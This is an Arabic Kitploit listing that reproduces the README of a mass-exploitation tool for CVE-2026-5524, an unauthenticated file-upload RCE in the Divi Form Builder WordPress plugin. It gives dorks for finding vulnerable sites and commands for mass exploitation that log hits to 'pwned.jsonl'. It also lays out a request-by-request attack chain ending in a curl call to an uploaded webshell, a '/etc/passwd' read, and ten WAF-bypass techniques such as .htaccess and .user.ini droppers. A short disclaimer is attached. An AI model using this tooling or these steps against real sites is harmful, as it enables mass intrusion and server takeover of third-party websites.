Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-5524-PoC — أداة استغلال جماعي لثغرة CVE-2026-5524، وهي ثغرة رفع ملفات غير مصادق عليها تؤدي إلى تنفيذ أوامر عن بُعد (RCE) في Divi Form Builder. تتضمن الميزات فحصًا متعدد الخيوط، وتقنيات تجاوز جدار الحماية (WAF)، ونشر قشرة ويب مخصصة، وتنفيذ أوامر تفاعلي. | Kitploit
أدوات/GitHubGitHub/caterscam/cve-2026-5524-poc
الاستطلاعماسحات الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويبجمع المعلوماتتجاوز WAFاختبار الاختراقالقيادة والسيطرة

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الفريق الأحمر
تطوير الحمولات
GitHubcaterscam/cve-2026-5524-poc

CVE-2026-5524-PoC

أداة استغلال جماعي لثغرة CVE-2026-5524، وهي ثغرة رفع ملفات غير مصادق عليها تؤدي إلى تنفيذ أوامر عن بُعد (RCE) في Divi Form Builder. تتضمن الميزات فحصًا متعدد الخيوط، وتقنيات تجاوز جدار الحماية (WAF)، ونشر قشرة ويب مخصصة، وتنفيذ أوامر تفاعلي.

عرض المستودع
114منذ 2 أشهرلم تتم المراجعة بعد

CVE-2026-5524 — تنفيذ أوامر عن بُعد (RCE) غير مصادَق عليه في Divi Form Builder

مجموعة أدوات استغلال جماعي لـ CVE-2026-5524، وهي ثغرة رفع ملفات تعسفي غير مصادَق عليها في إضافة ووردبريس Divi Form Builder <= 5.1.8 تؤدي إلى تنفيذ أوامر عن بُعد.

version Devon Aji python telegram

الحقلالقيمة
CVE2026-5524
CVSS9.8 (Critical)
VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
الإصدارات المتأثرةDivi Form Builder <= 5.1.8
الإصدار المُصحَّح5.1.9
النوعرفع ملفات غير مصادَق عليه يؤدي إلى RCE
الباحث0xd4rk5id3 - EnvoraSec

المحتويات

  • الوصف
  • Dorks
  • التثبيت
  • الاستخدام
    • هدف واحد
    • استغلال جماعي
    • تجاوز متقدم
    • تنفيذ الأوامر
  • تفاصيل الثغرة
  • تقنيات التجاوز
  • التقنيات المستخدمة
  • هيكل المشروع
  • مسار الهجوم
  • إخلاء المسؤولية

الوصف

تحتوي إضافة Divi Form Builder لووردبريس على ثغرة رفع ملفات تعسفي غير مصادَق عليها. يمرر المعالج do_image_upload() معامل POST acceptFileTypes الذي يتحكم فيه المستخدم مباشرةً إلى تعبير نمطي يُستخدم للتحقق من امتدادات الملفات. بتزويد قيمة مثل phtml، يمكن للمهاجم تجاوز قاعدة .htaccess في الإضافة التي تمنع امتداد .php فقط، ورفع قشرة ويب بامتداد ينفذه PHP (.phtml، .phar، .php5، .php7، وما شابه ذلك).

بمجرد وصول الملف إلى /wp-content/uploads/de_fb_uploads/، ينفذه Apache كـ PHP، مما يمنح المهاجم تنفيذ أوامر عن بُعد بصلاحيات مستخدم خادم الويب.

تم إصلاح هذه المشكلة في Divi Form Builder 5.1.9.


Dorks

FOFA

root@kitploit:~
body="de_fb_obj" && body="fb_nonce"

Shodan

root@kitploit:~
http.html:"de_fb_obj" http.html:"fb_nonce"

Google

root@kitploit:~
inurl:"/wp-content/plugins/divi-form-builder/"

ZoomEye

root@kitploit:~
app:"WordPress" && body:"de_fb_obj"

Censys

root@kitploit:~
services.http.response.body: "de_fb_obj"

التثبيت

المتطلبات: بايثون 3.8 أو أحدث على لينكس أو macOS أو WSL.

root@kitploit:~
git clone https://github.com/caterscam/CVE-2026-5524-PoC/
cd CVE-2026-5524-PoC
pip3 install -r requirements.txt

requirements.txt

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0

الاستخدام

هدف واحد

root@kitploit:~
python3 CVE-2026-5524.py -u https://target.com

الاستغلال الجماعي

root@kitploit:~
python3 CVE-2026-5524.py -l targets.txt --shell-file bypass.phtml --aggressive --no-verify -o pwned.jsonl -t 20

تجاوز متقدم

للأهداف الواقعة خلف جدار حماية تطبيقات الويب (WAF) مثل NinjaFirewall أو Wordfence أو ModSecurity، أو تلك التي لديها تكوين Apache أو nginx مُشدَّد.

root@kitploit:~
python3 CVE-2026-5524.py -u https://target.com --shell-file bypass.phtml --aggressive --no-verify --debug

تنفيذ الأوامر

بعد عملية رفع ناجحة، يمكن للسكريبت تنفيذ أمر فورًا أو الدخول إلى قشرة تفاعلية.

root@kitploit:~
python3 CVE-2026-5524.py -u https://target.com --cmd "id; uname -a; cat /etc/passwd"
python3 CVE-2026-5524.py -u https://target.com --shell

الخيارات


تفاصيل الثغرة

الكود المعرَّض للثغرة

يُنشئ المعالج المعرَّض للثغرة تعبيرًا نمطيًا من مدخلات المستخدم دون تنقية.

root@kitploit:~
public function do_image_upload() {
    $accepted = $_POST['acceptFileTypes'];
    $pattern  = '/\\.(' . $accepted . ')$/i';

    if (preg_match($pattern, $filename)) {
        move_uploaded_file($tmp, $dest);
    }
}

عند إرسال acceptFileTypes=phtml، يطابق التعبير النمطي الناتج /\.(phtml)$/i أسماء الملفات المنتهية بـ .phtml، حتى مع أن ملف .htaccess الخاص بالإضافة يمنع امتداد .php فقط. بعدها ينفذ Apache الملف المرفوع كـ PHP، محققًا تنفيذ أوامر عن بُعد.

سلسلة الهجوم المؤكدة

  1. زحف إلى صفحة تتضمن نموذج Divi Form Builder (/، /contact، /quote، إلخ). أضف معامل ?nocache=<random> لتفادي Varnish وWP Rocket وذاكرات التخزين المؤقت الأخرى التي قد تقدم nonce قديمًا.

  2. استخرج قيمة fb_nonce من كائن الجافاسكريبت المترجم:

    root@kitploit:~
    de_fb_obj = {"fb_nonce":"<10 hex characters>", ...}
    
  3. أرسل طلب POST بنموذج multipart إلى /wp-admin/admin-ajax.php يتضمن:

    root@kitploit:~
    action=de_fb_image_upload
    fb_nonce=<nonce>
    acceptFileTypes=phtml
    [email protected]
    
  4. اقرأ عنوان URL للملف من استجابة JSON:

    root@kitploit:~
    {"files":[{"name":"abc123.phtml","url":"https://target/wp-content/uploads/de_fb_uploads/abc123.phtml",...}]}
    
  5. اطلب القشرة بأمر مشفَّر بـ base64:

    root@kitploit:~
    curl "https://target/wp-content/uploads/de_fb_uploads/abc123.phtml?x=$(echo -n id | base64)"
    

تقنيات التجاوز

يحاول السكريبت كل تقنية بترتيب الأولوية، وعند تفعيل --aggressive، يحاول جميعها حتى بعد نجاح أول عملية رفع.


التقنيات المستخدمة

سكريبت الاستغلال

القشرة المخصصة (bypass.phtml)


هيكل المشروع

root@kitploit:~
cve-2026-5524/
|-- CVE-2026-5524.py          Main exploit script
|-- bypass.phtml              16 KB multi-layer PHP webshell
|-- htaccess_enable.phtml     Dropper that writes a re-enabling .htaccess
|-- user_ini.phtml            Dropper that writes a .user.ini for PHP-FPM
|-- targets.txt               Example target list
|-- pwned.jsonl               Generated by the -o flag during mass scans
|-- requirements.txt          Python dependencies
`-- README.md                 This document

مسار الهجوم

root@kitploit:~
+--------------------------------------------------+
| 1. Recon                                         |
|    GET /?nocache=<random>                        |
|    Parse fb_nonce from de_fb_obj                 |
+-------------------------+------------------------+
                          |
                          v
+--------------------------------------------------+
| 2. Craft exploit                                 |
|    POST /wp-admin/admin-ajax.php                 |
|    action=de_fb_image_upload                     |
|    acceptFileTypes=phtml                         |
|    [email protected]                             |
+-------------------------+------------------------+
                          |
                          v
+--------------------------------------------------+
| 3. Server accepts and stores file                |
|    /uploads/de_fb_uploads/<random>.phtml         |
+-------------------------+------------------------+
                          |
                          v
+--------------------------------------------------+
| 4. Execute                                       |
|    GET shell.phtml?x=base64(command)             |
|    Remote code execution achieved                |
+--------------------------------------------------+

إخلاء المسؤولية

تُقدَّم هذه الأداة لأغراض تعليمية وللاستخدام خلال مهام اختبار الاختراق المصرَّح بها. من أمثلة الاستخدام المقبول:

  • برامج مكافآت الثغرات (Bug Bounty) التي تأذن صراحةً باختبار الهدف
  • مسابقات Capture the Flag وبيئات المختبرات المخصصة
  • التقييمات الأمنية الداخلية بإذن كتابي من مالك الأصل
  • البحوث الأمنية الأكاديمية التي تُجرى في بيئة خاضعة للرقابة

الاستخدام غير المصرَّح به ضد أنظمة لا تملكها أو ليس لديك إذن كتابي صريح باختبارها يعد غير قانوني في جميع السلطات القضائية تقريبًا وهو ممنوع منعًا باتًا. لا يقر المؤلف سوء استخدام هذا الكود ولا يتحمل أي مسؤولية عنه.

J'ai la permission et je suis autorisé à effectuer ce pentest. (لدي الإذن وأنا مخوَّل بإجراء اختبار الاختراق هذا.)

من القوانين التي يُرجَّح أن تكون ذات صلة: قانون UU ITE الإندونيسي، وقانون الاحتيال وإساءة استخدام الحاسوب الأمريكي (Computer Fraud and Abuse Act)، واتفاقية الجرائم الإلكترونية للاتحاد الأوروبي، وما يعادلها من تشريعات في أماكن أخرى. عند الشك، احصل على إذن كتابي أولاً.


الترخيص

للاستخدام التعليمي فقط. راجع قسم إخلاء المسؤولية للحصول على شروط الاستخدام الكاملة.

تنزيل الأداة
الخيارالوصف
-u URLعنوان URL لهدف واحد
-l FILEملف يحتوي قائمة الأهداف، عنوان URL واحد في كل سطر
-t Nعدد الخيوط المتزامنة (الافتراضي 10)
--timeout Nمهلة الطلب بالثواني (الافتراضي 15)
-o FILEحفظ النتائج في ملف إخراج JSONL
--proxy URLتوجيه حركة المرور عبر بروكسي HTTP
--nonce HASHاستخدام nonce مقدم يدويًا وتخطي الاكتشاف التلقائي
--ext EXTفرض امتداد واحد بدلاً من قائمة التجاوز الكاملة
--shellالدخول إلى قشرة RCE تفاعلية عند النجاح (لهدف واحد فقط)
--cmd CMDتنفيذ أمر واحد على الهدف ثم الخروج
--shell-file FILEرفع حمولة قشرة مخصصة بدلاً من القشرة المدمجة
--no-verifyتخطي خطوة التحقق من RCE بعد الرفع
--strict-verifyالتأكد من أن عنوان القشرة يعيد HTTP 200 لتصفية النتائج الإيجابية الكاذبة
--user-iniرفع ملف إسقاط .user.ini لبيئات PHP-FPM
--htaccessرفع ملف .htaccess يعيد التمكين لبيئات Apache
--aggressiveتفعيل جميع تقنيات التجاوز المتاحة
--null-byteتضمين محاولات البايت الفارغ (Null Byte) والامتداد المزدوج
--path-traversalمحاولة الرفع إلى المجلدات الفرعية /uploads/YYYY/MM/
--debugطباعة استجابات HTTP الخام للتشخيص
#التقنيةالأهداف
1امتدادات PHP بديلة .phtml، .phar، .php5، .php7، .php4، .pht، .shtmlقاعدة .htaccess في الإضافة التي تمنع .php فقط
2تنويع حالة الأحرف .PHTML، .PHP5، .PhTmLتوقيعات WAF الحساسة لحالة الأحرف (NinjaFirewall)
3امتداد مزدوج .phtml.jpg، .php.jpgسلوكيات التفاوض على المحتوى في Apache mod_mime
4بايت فارغ .php%00.jpg، .phtml%00.txtإصدارات PHP القديمة (أقل من 5.3.4) وبعض المحللات
5مسافة أو نقطة لاحقة .php ، .php.IIS على ويندوز وإصدارات Apache الأقدم
6انتحال Content-Type بقيمة application/octet-streamجدران WAF التي تعتمد على ترويسة Content-Type في multipart
7رفع ملف .htaccess حقيقي يعيد تمكين PHP لامتدادات .gif، .png، .jpg، .txt، .html، وغيرهاخوادم Apache مع AllowOverride All
8رفع ملف .user.ini يحتوي على auto_prepend_fileبيئات PHP-FPM
9حقن اسم الملف عبر التلاعب بحدود multipartالبروكسيات وجدران WAF التي تعيد تحليل جسم الطلب
10اجتياز المسار ../shell.phtml في اسم الملفقيود مجلدات الإضافة
المكوِّنالتقنية
اللغةPython 3.8+
عميل HTTPrequests
معالجة TLSurllib3 في الوضع غير الآمن للشهادات الذاتية التوقيع
التزامنconcurrent.futures.ThreadPoolExecutor للمسح الجماعي
التحليلre لاستخراج nonce وjson لمعالجة الاستجابات
الترميزbase64 لمعامل أوامر قشرة الويب
واجهة الأوامرargparse مع 19 خيارًا قابلًا للضبط
المكوِّنالتقنية
اللغةPHP 7.0+
دوال التنفيذsystem()، shell_exec()، proc_open()، passthru()، popen()
الواجهة الأماميةنموذج HTML بسيط دون إطار جافاسكريبت
الميزاتمتصفح ملفات، تنفيذ أوامر، وصول إلى قاعدة البيانات، قشرة عكسية، تثبيت ذاتي لـ .htaccess و.user.ini
الحجمحوالي 16 كيلوبايت
طبقات التجاوزستة مسارات تنفيذ مستقلة بالإضافة إلى حمولات مشفَّرة